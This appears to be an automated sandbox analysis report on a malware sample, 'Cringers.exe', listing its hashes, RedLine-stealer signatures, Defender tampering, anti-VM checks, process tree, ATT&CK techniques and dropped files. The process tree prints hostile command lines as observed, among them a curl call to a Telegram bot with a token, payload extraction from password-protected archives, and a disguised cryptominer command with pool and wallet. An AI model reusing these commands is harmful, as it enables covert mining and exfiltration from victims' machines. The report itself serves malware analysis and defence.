Analysis

  • max time kernel
    146s
  • max time network
    145s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    05-12-2021 14:55

General

  • Target

    Cringers.exe

  • Size

    1.5MB

  • MD5

    f79d68c8b8baac77eea56ffdecc010c1

  • SHA1

    3b5996718d1fcb3f937d4a508cab257d21493059

  • SHA256

    c4b2fb2998f0c6cd914723a5855116dcbe582d8875e25e424d99064e243ff971

  • SHA512

    ad98de3d6e36803e7eaa11fd8e296e5194077106a92f40b045f3a6ff135ef09f4be9a6bc8071f53df7b3686123ea07bcde6a7c042668a7253675c54cb2732a79

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Cringers.exe
    "C:\Users\Admin\AppData\Local\Temp\Cringers.exe"
    1⤵
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2628
    • C:\Users\Admin\AppData\Local\Temp\svhost.exe
      "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:356
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl "https://api.telegram.org/bot5080947553:AAFY7o6U7eYnp2cSVZgI5zrrBthTLC1DEQo/sendMessage?chat_id=783936763&text=%F0%9F%90%B7%20%D0%A3%20%D0%B2%D0%B0%D1%81%20%D0%BD%D0%BE%D0%B2%D1%8B%D0%B9%20%D0%B2%D0%BE%D1%80%D0%BA%D0%B5%D1%80!%0A%D0%92%D0%B8%D0%B4%D0%B5%D0%BE%D0%BA%D0%B0%D1%80%D1%82%D0%B0%3A%20Microsoft Basic Display Adapter%0A(Windows%20Defender%20has%20been%20turned%20off)"
        3⤵
          PID:3264
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1264
          • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
            C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:1608
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2020
          • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
            C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:1860
        • C:\Windows\bfsvc.exe
          C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7531B4866f890E27b546527643D1Bc04121Cd62f -coin etc -worker EasyMiner_Bot -clKernel 3
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          PID:2128
        • C:\Windows\explorer.exe
          C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7531B4866f890E27b546527643D1Bc04121Cd62f -coin etc -worker EasyMiner_Bot -clKernel 3
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          PID:3228

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Modify Existing Service

    1
    T1031

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    2
    T1112

    Disabling Security Tools

    1
    T1089

    Virtualization/Sandbox Evasion

    1
    T1497

    Credential Access

    Credentials in Files

    2
    T1081

    Discovery

    Query Registry

    3
    T1012

    Virtualization/Sandbox Evasion

    1
    T1497

    System Information Discovery

    3
    T1082

    Collection

    Data from Local System

    2
    T1005

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\svhost.exe
      MD5

      42ce12c674a64387e1f7bbfd4491b03d

      SHA1

      472beb49130cc19dbdd5dce8a09234103d3c72a0

      SHA256

      87087dc5efa0b2f0ff2b2d0052fa09c26609f3ebf3fe78d92de9f027abd13177

      SHA512

      371dae7c04548124aece3fb208bdaa0650cbd501a9747c6423b36517b1dc78395492beafd8becbe49e50736de06ff81c0fb42d820213637a3c05e7fec02ecd7a

    • C:\Users\Admin\AppData\Local\Temp\svhost.exe
      MD5

      42ce12c674a64387e1f7bbfd4491b03d

      SHA1

      472beb49130cc19dbdd5dce8a09234103d3c72a0

      SHA256

      87087dc5efa0b2f0ff2b2d0052fa09c26609f3ebf3fe78d92de9f027abd13177

      SHA512

      371dae7c04548124aece3fb208bdaa0650cbd501a9747c6423b36517b1dc78395492beafd8becbe49e50736de06ff81c0fb42d820213637a3c05e7fec02ecd7a

    • C:\Users\Admin\AppData\Roaming\Microsoft\7z.dll
      MD5

      42336b5fc6be24babfb87699c858fb27

      SHA1

      38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

      SHA256

      b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

      SHA512

      f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

    • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
      MD5

      86e8388e83be8909d148518cf7b6e083

      SHA1

      4f7fdcf3abc0169b591e502842be074a5188c2c9

      SHA256

      4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

      SHA512

      2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

    • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
      MD5

      86e8388e83be8909d148518cf7b6e083

      SHA1

      4f7fdcf3abc0169b591e502842be074a5188c2c9

      SHA256

      4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

      SHA512

      2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

    • C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.exe
      MD5

      67a55e73dc3e285f5ecad2f52e4606aa

      SHA1

      280b8d8083aac33e1b05078bb6706f155cae47c7

      SHA256

      fc0e21a8e33d53a30207d3e0e3dc9079e253fc623cc4835877cbc39ca7a826a3

      SHA512

      e12b564cc866d3d50246c4326e0086daa3086adf8084f69c1f0fa49a091ed9a2c93ea07a2f6cc4eec30dea54492dbf12950e8e3e7f6c26208f7b57860f362efe

    • C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip
      MD5

      1543b223f63fda679a94d034d23b27ba

      SHA1

      82eb69d0d096ff966679ce92c4fb2dd5a8dd6f1e

      SHA256

      30868a1cadb90f598ec9d96f93650c90883941522134b2e0a2dfeca958958e34

      SHA512

      270de3749322416e371d5177b974450e5e2fbca3570179d2f4811f1fda55aca4ea82cbd0a37d1b56ee8614be154373054b573da854a818caafb41b3cee502f78

    • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.exe
      MD5

      9d99b4d43e4e7a0408c5fe99b4cc4afe

      SHA1

      702436963243f0de2d431ec29b199505a0aa3b90

      SHA256

      c9e36c039bfc370135feabad11840fe457caec3c4914351461f3f9e115194fb3

      SHA512

      44620e76efc6d0cefc1c6f8eca77c0114d41fbf4d6e1f6ff2287286ff57aca1679a0428b35c757afb96fd31d99de8b9e1d956b89636d9c373248e5c5b5b05754

    • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip
      MD5

      32ab3a6509fe78d666dcafc5be73f2e1

      SHA1

      c16e1c2716b4ae5b9e5bfb9773d810344b539126

      SHA256

      dd2170bbea158a2c2b8c262c2be9c8d91fc3e86efe7f607fce7a9224a389bdec

      SHA512

      c31ee784de253c4f5c36990959d8e6f74b2b0eeecfd265cab2d5295be33f7af056e144d829adcd754c78e06023816cb3f576110314717ee7e50cc0af507f02fe

    • \Users\Admin\AppData\Roaming\Microsoft\7z.dll
      MD5

      42336b5fc6be24babfb87699c858fb27

      SHA1

      38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

      SHA256

      b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

      SHA512

      f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

    • \Users\Admin\AppData\Roaming\Microsoft\7z.dll
      MD5

      42336b5fc6be24babfb87699c858fb27

      SHA1

      38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

      SHA256

      b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

      SHA512

      f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

    • memory/356-183-0x0000000000000000-mapping.dmp
    • memory/1264-187-0x0000000000000000-mapping.dmp
    • memory/1608-188-0x0000000000000000-mapping.dmp
    • memory/1860-194-0x0000000000000000-mapping.dmp
    • memory/2020-193-0x0000000000000000-mapping.dmp
    • memory/2128-208-0x00007FF645770000-0x00007FF645B41000-memory.dmp
      Filesize

      3.8MB

    • memory/2128-206-0x0000000140000000-0x0000000141660000-memory.dmp
      Filesize

      22.4MB

    • memory/2128-204-0x000001806B0D0000-0x000001806B0D2000-memory.dmp
      Filesize

      8KB

    • memory/2128-205-0x000001806B0D0000-0x000001806B0D2000-memory.dmp
      Filesize

      8KB

    • memory/2128-213-0x0000000140000000-0x0000000141660000-memory.dmp
      Filesize

      22.4MB

    • memory/2128-215-0x0000000140000000-0x0000000141660000-memory.dmp
      Filesize

      22.4MB

    • memory/2128-200-0x000000014165D878-mapping.dmp
    • memory/2128-199-0x0000000140000000-0x0000000141660000-memory.dmp
      Filesize

      22.4MB

    • memory/2128-218-0x0000000140000000-0x0000000141660000-memory.dmp
      Filesize

      22.4MB

    • memory/2128-220-0x0000000140000000-0x0000000141660000-memory.dmp
      Filesize

      22.4MB

    • memory/2628-144-0x0000000002930000-0x0000000002931000-memory.dmp
      Filesize

      4KB

    • memory/2628-182-0x0000000007810000-0x0000000007811000-memory.dmp
      Filesize

      4KB

    • memory/2628-147-0x0000000002910000-0x0000000002911000-memory.dmp
      Filesize

      4KB

    • memory/2628-148-0x0000000002900000-0x0000000002901000-memory.dmp
      Filesize

      4KB

    • memory/2628-150-0x00000000036B0000-0x00000000036B1000-memory.dmp
      Filesize

      4KB

    • memory/2628-149-0x0000000002970000-0x0000000002971000-memory.dmp
      Filesize

      4KB

    • memory/2628-151-0x00000000036B0000-0x00000000036B1000-memory.dmp
      Filesize

      4KB

    • memory/2628-152-0x00000000036B0000-0x00000000036B1000-memory.dmp
      Filesize

      4KB

    • memory/2628-153-0x00000000036B0000-0x00000000036B1000-memory.dmp
      Filesize

      4KB

    • memory/2628-154-0x00000000036B0000-0x00000000036B1000-memory.dmp
      Filesize

      4KB

    • memory/2628-155-0x0000000000B50000-0x0000000000B51000-memory.dmp
      Filesize

      4KB

    • memory/2628-156-0x0000000002A80000-0x0000000002A81000-memory.dmp
      Filesize

      4KB

    • memory/2628-157-0x0000000002A90000-0x0000000002A91000-memory.dmp
      Filesize

      4KB

    • memory/2628-158-0x0000000002A40000-0x0000000002A41000-memory.dmp
      Filesize

      4KB

    • memory/2628-159-0x0000000002AB0000-0x0000000002AB1000-memory.dmp
      Filesize

      4KB

    • memory/2628-160-0x0000000002A70000-0x0000000002A71000-memory.dmp
      Filesize

      4KB

    • memory/2628-161-0x0000000005DE0000-0x0000000005DE1000-memory.dmp
      Filesize

      4KB

    • memory/2628-162-0x0000000002A60000-0x0000000002A61000-memory.dmp
      Filesize

      4KB

    • memory/2628-163-0x0000000002AD0000-0x0000000002AD1000-memory.dmp
      Filesize

      4KB

    • memory/2628-164-0x0000000000B50000-0x0000000000B51000-memory.dmp
      Filesize

      4KB

    • memory/2628-166-0x0000000002AC0000-0x0000000002AC1000-memory.dmp
      Filesize

      4KB

    • memory/2628-168-0x0000000000B50000-0x0000000000B51000-memory.dmp
      Filesize

      4KB

    • memory/2628-167-0x0000000000F60000-0x0000000000F61000-memory.dmp
      Filesize

      4KB

    • memory/2628-165-0x0000000000B50000-0x0000000000B51000-memory.dmp
      Filesize

      4KB

    • memory/2628-169-0x0000000000B50000-0x0000000000B51000-memory.dmp
      Filesize

      4KB

    • memory/2628-170-0x0000000006450000-0x0000000006451000-memory.dmp
      Filesize

      4KB

    • memory/2628-171-0x0000000006480000-0x0000000006481000-memory.dmp
      Filesize

      4KB

    • memory/2628-172-0x0000000006590000-0x0000000006591000-memory.dmp
      Filesize

      4KB

    • memory/2628-173-0x00000000065E0000-0x00000000065E1000-memory.dmp
      Filesize

      4KB

    • memory/2628-174-0x0000000006620000-0x0000000006621000-memory.dmp
      Filesize

      4KB

    • memory/2628-175-0x00000000067B0000-0x00000000067B1000-memory.dmp
      Filesize

      4KB

    • memory/2628-176-0x0000000006CC0000-0x0000000006CC1000-memory.dmp
      Filesize

      4KB

    • memory/2628-177-0x0000000007170000-0x0000000007171000-memory.dmp
      Filesize

      4KB

    • memory/2628-178-0x0000000007300000-0x0000000007301000-memory.dmp
      Filesize

      4KB

    • memory/2628-179-0x0000000007530000-0x0000000007531000-memory.dmp
      Filesize

      4KB

    • memory/2628-180-0x00000000083E0000-0x00000000083E1000-memory.dmp
      Filesize

      4KB

    • memory/2628-181-0x00000000085C0000-0x00000000085C1000-memory.dmp
      Filesize

      4KB

    • memory/2628-146-0x0000000002950000-0x0000000002951000-memory.dmp
      Filesize

      4KB

    • memory/2628-145-0x00000000028E0000-0x00000000028E1000-memory.dmp
      Filesize

      4KB

    • memory/2628-118-0x0000000000400000-0x00000000007F4000-memory.dmp
      Filesize

      4.0MB

    • memory/2628-143-0x0000000002920000-0x0000000002921000-memory.dmp
      Filesize

      4KB

    • memory/2628-119-0x0000000000E70000-0x0000000000ED0000-memory.dmp
      Filesize

      384KB

    • memory/2628-142-0x00000000036B0000-0x00000000036B1000-memory.dmp
      Filesize

      4KB

    • memory/2628-141-0x00000000036B0000-0x00000000036B1000-memory.dmp
      Filesize

      4KB

    • memory/2628-140-0x0000000000F50000-0x0000000000F51000-memory.dmp
      Filesize

      4KB

    • memory/2628-139-0x0000000000F30000-0x0000000000F31000-memory.dmp
      Filesize

      4KB

    • memory/2628-138-0x0000000000EE0000-0x0000000000EE1000-memory.dmp
      Filesize

      4KB

    • memory/2628-136-0x0000000000F10000-0x0000000000F11000-memory.dmp
      Filesize

      4KB

    • memory/2628-137-0x0000000000B60000-0x0000000000B61000-memory.dmp
      Filesize

      4KB

    • memory/2628-135-0x0000000000F00000-0x0000000000F01000-memory.dmp
      Filesize

      4KB

    • memory/2628-133-0x00000000036B0000-0x00000000036B1000-memory.dmp
      Filesize

      4KB

    • memory/2628-134-0x00000000036B0000-0x00000000036B1000-memory.dmp
      Filesize

      4KB

    • memory/2628-132-0x00000000036B0000-0x00000000036B1000-memory.dmp
      Filesize

      4KB

    • memory/2628-131-0x00000000036B0000-0x00000000036B1000-memory.dmp
      Filesize

      4KB

    • memory/2628-129-0x00000000029F0000-0x00000000029F1000-memory.dmp
      Filesize

      4KB

    • memory/2628-130-0x00000000036C0000-0x00000000036C1000-memory.dmp
      Filesize

      4KB

    • memory/2628-125-0x00000000029B0000-0x00000000029B1000-memory.dmp
      Filesize

      4KB

    • memory/2628-120-0x00000000029D0000-0x00000000029D1000-memory.dmp
      Filesize

      4KB

    • memory/2628-121-0x00000000029E0000-0x00000000029E1000-memory.dmp
      Filesize

      4KB

    • memory/2628-127-0x0000000002A20000-0x0000000002A21000-memory.dmp
      Filesize

      4KB

    • memory/2628-126-0x0000000000400000-0x0000000000402000-memory.dmp
      Filesize

      8KB

    • memory/2628-124-0x00000000029C0000-0x00000000029C1000-memory.dmp
      Filesize

      4KB

    • memory/2628-122-0x0000000002990000-0x0000000002991000-memory.dmp
      Filesize

      4KB

    • memory/2628-123-0x0000000002A00000-0x0000000002A01000-memory.dmp
      Filesize

      4KB

    • memory/3228-211-0x00007FF75FDB0000-0x00007FF760181000-memory.dmp
      Filesize

      3.8MB

    • memory/3228-207-0x0000000000DA0000-0x0000000000DA2000-memory.dmp
      Filesize

      8KB

    • memory/3228-209-0x0000000000DA0000-0x0000000000DA2000-memory.dmp
      Filesize

      8KB

    • memory/3228-212-0x0000000140000000-0x0000000140E38000-memory.dmp
      Filesize

      14.2MB

    • memory/3228-210-0x0000000140000000-0x0000000140E38000-memory.dmp
      Filesize

      14.2MB

    • memory/3228-214-0x0000000140000000-0x0000000140E38000-memory.dmp
      Filesize

      14.2MB

    • memory/3228-216-0x0000000140000000-0x0000000140E38000-memory.dmp
      Filesize

      14.2MB

    • memory/3228-202-0x0000000140000000-0x0000000140E38000-memory.dmp
      Filesize

      14.2MB

    • memory/3228-203-0x0000000140E36784-mapping.dmp
    • memory/3264-186-0x0000000000000000-mapping.dmp